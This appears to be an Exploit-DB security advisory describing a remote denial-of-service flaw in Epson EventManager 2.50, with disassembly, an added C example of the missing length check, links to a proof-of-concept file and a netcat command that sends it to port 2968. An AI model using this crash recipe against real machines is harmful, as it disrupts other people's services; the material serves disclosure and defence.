Epson EventManager 2.50 - Denial of Service

EDB-ID:       18602
CVE:
Platform:     Windows
Published:    2012-03-14

#######################################################################

                             Luigi Auriemma

Application:  Epson EventManager
              http://www.epson.com
Versions:     <= 2.50
Platforms:    Windows
Bug:          Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Epson EventManager is a program that starts with the computer and
listens on port 2968 ("Network Scan" is enabled by default). It lets the
user automate some actions of Epson scanners (such as the scan&save
button) through the PushScan protocol.


#######################################################################

======
2) Bug
======


The secure strncpy function that copies the "x-protocol-version" string
into a 7-byte buffer can be forced to (auto)terminate the program when
the string is longer than that size and starts with "1.":

  0163967F  |> 53             PUSH EBX
  01639680  |. 8B5C24 24      MOV EBX,DWORD PTR SS:[ESP+24]
  01639684  |. 53             PUSH EBX
  01639685  |. 50             PUSH EAX
  01639686  |. E8 25F8FFFF    CALL epnsm.01638EB0   ; parse "x-protocol-version" string
  0163968B  |. 83C4 08        ADD ESP,8
  0163968E  |. 83F8 01        CMP EAX,1
  01639691  |. 0F85 FC000000  JNZ epnsm.01639793    ; version 1
  01639697  |. 8B4C24 2C      MOV ECX,DWORD PTR SS:[ESP+2C]
  0163969B  |. 8B5424 0C      MOV EDX,DWORD PTR SS:[ESP+C]
  0163969F  |. 6A 06          PUSH 6
  016396A1  |. 33C0           XOR EAX,EAX
  016396A3  |. 52             PUSH EDX
  016396A4  |. 8901           MOV DWORD PTR DS:[ECX],EAX
  016396A6  |. 51             PUSH ECX
  016396A7  |. 66:8941 04     MOV WORD PTR DS:[ECX+4],AX
  016396AB  |. E8 D0B5FFFF    CALL epnsm.01634C80   ; secure strncpy

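The check the listing above is missing, as an added example in C (not code from the advisory or from Epson): the header value is length-checked and rejected when it does not fit, instead of being handed to a strncpy_s-style routine whose constraint handler ends the process. The "name: value" line layout and the exact-case header name are assumptions; the 7-byte buffer and the version-1 gate come from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define VERSION_BUF 7   /* destination size named in the advisory */

/* Bounded copy: returns 0 on success, -1 if src (with its terminator)
 * does not fit.  An over-long value is reported to the caller instead
 * of being passed to a constraint handler that aborts the process. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Parse one "x-protocol-version: <value>" line (layout assumed), keep
 * only version-1 values as the CMP EAX,1 branch does, and copy the value
 * into out.  Returns 1 if accepted, 0 if the line is another header,
 * -1 if the value is not version 1 or does not fit in out. */
int parse_x_protocol_version(const char *line, char *out, size_t outsz)
{
    static const char name[] = "x-protocol-version:";
    size_t nlen = strlen(name);
    if (strncmp(line, name, nlen) != 0)
        return 0;
    const char *v = line + nlen;
    while (*v == ' ' || *v == '\t')
        v++;
    if (strncmp(v, "1.", 2) != 0)
        return -1;
    /* Validate the length here rather than trusting the copy routine. */
    return copy_bounded(out, outsz, v) == 0 ? 1 : -1;
}

int main(void)
{
    char ver[VERSION_BUF];
    /* Constructed sample lines: one that fits, one over-long. */
    printf("%d\n", parse_x_protocol_version("x-protocol-version: 1.0", ver, sizeof ver));
    printf("%d\n", parse_x_protocol_version("x-protocol-version: 1.0000000000", ver, sizeof ver));
    return 0;
}
```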

#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/eeventmanager_1.dat
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18602.dat

  nc SERVER 2968 < eeventmanager_1.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################